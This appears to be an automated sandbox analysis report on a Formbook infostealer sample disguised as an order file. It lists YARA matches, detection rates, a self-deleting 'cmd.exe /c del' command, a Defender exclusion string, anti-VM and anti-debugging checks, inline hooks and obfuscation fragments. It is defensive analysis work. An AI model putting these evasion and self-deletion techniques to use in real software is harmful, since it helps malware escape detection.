Source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.305618158.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.502736423.0000000000980000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.245056631.0000000003EE9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.504085150.0000000000BD0000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.305837682.0000000000B70000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000F.00000002.501752912.0000000000170000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000003.00000002.305819661.0000000000B40000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 3.2.NEW ORDER SOR 10531220.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: NEW ORDER SOR 10531220.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: classification engine Classification label: mal100.troj.evad.winEXE@9/1@3/2
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\NEW ORDER SOR 10531220.exe.log
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5808:120:WilError_01
Source: NEW ORDER SOR 10531220.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: Select * from Clientes WHERE id=@id;;
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: Select * from Aluguel Erro ao listar Banco sql-Aluguel.INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE id=@id;
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType WHERE modelo=@modelo;
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Itens_Aluguel VALUES(@aluguelID, @aviaoID, @validade);
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: Insert into Clientes values (@nome, @cpf, @rg, @cidade, @endereco, @uf, @telefone);
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Aluguel VALUES(@clienteID, @data);
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SecurityLogonType VALUES(@modelo, @fabricante, @ano, @cor);
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: Select * from SecurityLogonType*Erro ao listar Banco sql-SecurityLogonType,Select * from SecurityLogonType WHERE id=@id;Select * from SecurityLogonType WHERE (modelo LIKE @modelo)
Source: NEW ORDER SOR 10531220.exe Virustotal: Detection: 60%
Source: NEW ORDER SOR 10531220.exe Metadefender: Detection: 20%
Source: NEW ORDER SOR 10531220.exe ReversingLabs: Detection: 51%
Source: NEW ORDER SOR 10531220.exe String found in binary or memory: &Report-HelpToolStripMenuItem1
Source: unknown Process created: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe 'C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe'
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Process created: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Process created: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe'
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: NEW ORDER SOR 10531220.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: NEW ORDER SOR 10531220.exe Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: NEW ORDER SOR 10531220.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: netsh.pdb source: NEW ORDER SOR 10531220.exe, 00000003.00000002.310618621.0000000002E50000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP source: NEW ORDER SOR 10531220.exe, 00000003.00000002.306018733.00000000010C0000.00000040.00000001.sdmp, netsh.exe, 0000000F.00000002.504469970.0000000000D20000.00000040.00000001.sdmp
Source: Binary string: netsh.pdbGCTL source: NEW ORDER SOR 10531220.exe, 00000003.00000002.310618621.0000000002E50000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: NEW ORDER SOR 10531220.exe, 00000003.00000002.306018733.00000000010C0000.00000040.00000001.sdmp, netsh.exe

Data Obfuscation:

Binary contains a suspicious time stamp
Source: NEW ORDER SOR 10531220.exe Static PE information: 0x9FBA10BA [Tue Dec 1 20:55:22 2054 UTC]
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00416950 push eax; retf 3_2_00416951
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_0041C167 push ebp; iretd 3_2_0041C16A
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00417237 push es; retf 3_2_00417238
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00416BCC push cs; retf 3_2_00416BD4
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_0040E394 push ebp; ret 3_2_0040E395
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00416486 push ecx; retf 3_2_0041648C
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_0041DD91 push edi; ret 3_2_0041DD93
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_0041DE8C push FFFFFF81h; ret 3_2_0041DE8F
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_0041CEB5 push eax; ret 3_2_0041CF08
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_0041CF6C push eax; ret 3_2_0041CF72
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_0041CF02 push eax; ret 3_2_0041CF08
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_0041CF0B push eax; ret 3_2_0041CF72
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_004077BF pushfd ; retf 3_2_004077C0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D9D0D1 push ecx; ret 15_2_00D9D0E4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00186950 push eax; retf 15_2_00186951
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_0018C167 push ebp; iretd 15_2_0018C16A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00187237 push es; retf 15_2_00187238
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_0017E394 push ebp; ret 15_2_0017E395
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00186BCC push cs; retf 15_2_00186BD4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00186486 push ecx; retf 15_2_0018648C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_0018DD91 push edi; ret 15_2_0018DD93
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_0018DE8C push FFFFFF81h; ret 15_2_0018DE8F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_0018CEB5 push eax; ret 15_2_0018CF08
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_0018CF0B push eax; ret 15_2_0018CF72
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_0018CF02 push eax; ret 15_2_0018CF08
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_0018CF6C push eax; ret 15_2_0018CF72
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_001777BF pushfd ; retf 15_2_001777C0
Source: initial sample Static PE information: section name: .text entropy: 7.87523328982

Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8A 0xAE 0xE0
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: NEW ORDER SOR 10531220.exe PID: 3756, type: MEMORY
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe RDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe RDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 00000000001798E4 second address: 00000000001798EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000179B5E second address: 0000000000179B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00409A90 rdtsc 3_2_00409A90
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Thread delayed: delay time: 922337203685477
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe TID: 4988 Thread sleep time: -104379s >= -30000s
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe TID: 2964 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 6292 Thread sleep time: -54000s >= -30000s
Source: C:\Windows\SysWOW64\netsh.exe TID: 7092 Thread sleep time: -55000s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Thread delayed: delay time: 104379
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000005.00000000.272356780.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000005.00000000.255542441.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000005.00000000.271861542.0000000008270000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: vmware
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 00000005.00000002.503945034.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000005.00000000.272500870.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000005.00000000.263138702.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000005.00000000.271861542.0000000008270000.00000002.00000001.sdmp Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000005.00000000.271861542.0000000008270000.00000002.00000001.sdmp Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000005.00000000.272500870.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: NEW ORDER SOR 10531220.exe, 00000000.00000002.244540222.0000000002F26000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
Source: explorer.exe, 00000005.00000000.271861542.0000000008270000.00000002.00000001.sdmp Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_00409A90 rdtsc 3_2_00409A90
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\NEW ORDER SOR 10531220.exe Code function: 3_2_0040ACD0 LdrLoadDll, 3_2_0040ACD0
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DDB8D0 mov eax, dword ptr fs:[00000030h] 15_2_00DDB8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DDB8D0 mov ecx, dword ptr fs:[00000030h] 15_2_00DDB8D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E014FB mov eax, dword ptr fs:[00000030h] 15_2_00E014FB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC6CF0 mov eax, dword ptr fs:[00000030h] 15_2_00DC6CF0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E18CD6 mov eax, dword ptr fs:[00000030h] 15_2_00E18CD6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D458EC mov eax, dword ptr fs:[00000030h] 15_2_00D458EC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5849B mov eax, dword ptr fs:[00000030h] 15_2_00D5849B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D49080 mov eax, dword ptr fs:[00000030h] 15_2_00D49080
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC3884 mov eax, dword ptr fs:[00000030h] 15_2_00DC3884
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7F0BF mov ecx, dword ptr fs:[00000030h] 15_2_00D7F0BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7F0BF mov eax, dword ptr fs:[00000030h] 15_2_00D7F0BF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D890AF mov eax, dword ptr fs:[00000030h] 15_2_00D890AF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D720A0 mov eax, dword ptr fs:[00000030h] 15_2_00D720A0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D60050 mov eax, dword ptr fs:[00000030h] 15_2_00D60050
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DDC450 mov eax, dword ptr fs:[00000030h] 15_2_00DDC450
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E02073 mov eax, dword ptr fs:[00000030h] 15_2_00E02073
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E11074 mov eax, dword ptr fs:[00000030h] 15_2_00E11074
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7A44B mov eax, dword ptr fs:[00000030h] 15_2_00D7A44B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D6746D mov eax, dword ptr fs:[00000030h] 15_2_00D6746D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC7016 mov eax, dword ptr fs:[00000030h] 15_2_00DC7016
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC6C0A mov eax, dword ptr fs:[00000030h] 15_2_00DC6C0A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E01C06 mov eax, dword ptr fs:[00000030h] 15_2_00E01C06
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E1740D mov eax, dword ptr fs:[00000030h] 15_2_00E1740D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E14015 mov eax, dword ptr fs:[00000030h] 15_2_00E14015
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7002D mov eax, dword ptr fs:[00000030h] 15_2_00D7002D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7BC2C mov eax, dword ptr fs:[00000030h] 15_2_00D7BC2C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5B02A mov eax, dword ptr fs:[00000030h] 15_2_00D5B02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5B02A mov eax, dword ptr fs:[00000030h] 15_2_00D5B02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5B02A mov eax, dword ptr fs:[00000030h] 15_2_00D5B02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5B02A mov eax, dword ptr fs:[00000030h] 15_2_00D5B02A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E0FDE2 mov eax, dword ptr fs:[00000030h] 15_2_00E0FDE2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E0FDE2 mov eax, dword ptr fs:[00000030h] 15_2_00E0FDE2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E0FDE2 mov eax, dword ptr fs:[00000030h] 15_2_00E0FDE2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E0FDE2 mov eax, dword ptr fs:[00000030h] 15_2_00E0FDE2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC6DC9 mov eax, dword ptr fs:[00000030h] 15_2_00DC6DC9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC6DC9 mov eax, dword ptr fs:[00000030h] 15_2_00DC6DC9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC6DC9 mov eax, dword ptr fs:[00000030h] 15_2_00DC6DC9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC6DC9 mov ecx, dword ptr fs:[00000030h] 15_2_00DC6DC9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC6DC9 mov eax, dword ptr fs:[00000030h] 15_2_00DC6DC9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DC6DC9 mov eax, dword ptr fs:[00000030h] 15_2_00DC6DC9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DF8DF1 mov eax, dword ptr fs:[00000030h] 15_2_00DF8DF1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4B1E1 mov eax, dword ptr fs:[00000030h] 15_2_00D4B1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4B1E1 mov eax, dword ptr fs:[00000030h] 15_2_00D4B1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D4B1E1 mov eax, dword ptr fs:[00000030h] 15_2_00D4B1E1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00DD41E8 mov eax, dword ptr fs:[00000030h] 15_2_00DD41E8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5D5E0 mov eax, dword ptr fs:[00000030h] 15_2_00D5D5E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D5D5E0 mov eax, dword ptr fs:[00000030h] 15_2_00D5D5E0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D72990 mov eax, dword ptr fs:[00000030h] 15_2_00D72990
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7FD9B mov eax, dword ptr fs:[00000030h] 15_2_00D7FD9B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00D7FD9B mov eax, dword ptr fs:[00000030h] 15_2_00D7FD9B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 15_2_00E105AC mov eax, dword ptr fs:[00000030h] 15_2_00E105AC
